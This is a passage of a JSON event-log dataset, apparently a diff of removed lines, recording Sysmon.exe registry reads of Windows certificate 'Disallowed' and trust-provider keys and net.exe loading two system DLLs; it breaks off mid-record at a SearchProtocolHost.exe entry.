"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "davhlpr.dll", - "image_path": "C:\\Windows\\System32\\davhlpr.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\SearchProtocolHost.exe\" 